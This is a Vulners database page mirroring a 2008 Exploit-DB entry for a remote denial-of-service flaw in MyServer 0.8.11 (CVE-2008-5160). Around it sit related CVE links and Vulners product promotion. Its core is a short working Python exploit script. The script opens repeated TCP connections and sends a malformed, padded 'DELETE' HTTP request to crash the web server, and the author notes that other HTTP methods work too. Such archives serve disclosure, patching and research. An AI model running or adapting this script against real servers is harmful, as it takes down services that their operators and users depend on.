Lucene search
+L

MyServer 0.8.11 - '204 No Content' error Remote Denial of Service

🗓️ 25 Feb 2008 00:00:00Reported by shinnaiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

MyServer 0.8.11 '204 No Content' error Remote Denial of Service vulnerability exploi

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2008-5160
18 Nov 200821:00
cve
Cvelist
CVE-2008-5160
18 Nov 200821:00
cvelist
EUVD
EUVD-2008-5138
7 Oct 202500:30
euvd
NVD
CVE-2008-5160
18 Nov 200821:30
nvd
OpenVAS
MyServer Remote Denial of Service Vulnerability
21 Nov 200800:00
openvas
OpenVAS
MyServer Remote Denial of Service Vulnerability
21 Nov 200800:00
openvas
Prion
Code injection
18 Nov 200821:30
prion
UbuntuCve
CVE-2008-5160
18 Nov 200821:30
ubuntucve
#exploit.py

import socket
import os

print '------------------------------------------------------------------'
print ' MyServer 0.8.11 "204 No Content" error Remote Denial of Service'
print ' url: www.myserverproject.net'
print ' author: shinnai'
print ' mail: shinnai[at]autistici[dot]org'
print ' site: http://shinnai.altervista.org'
print ' I do not have time for explanations, just to say that yuo can'
print ' use even other HTTP methods as GET, OPTIONS etc :-)'
print '------------------------------------------------------------------'

buff = "A" * 50
host = "127.0.0.1"
port = 80

for i in range (0,20):
    try:
        connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connection.connect((host, port))
        connection.send("DELETE" + buff + " HTTP/1.0\r\n")
    except:
        print "Unable to connect"

# milw0rm.com [2008-02-25]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.0347
29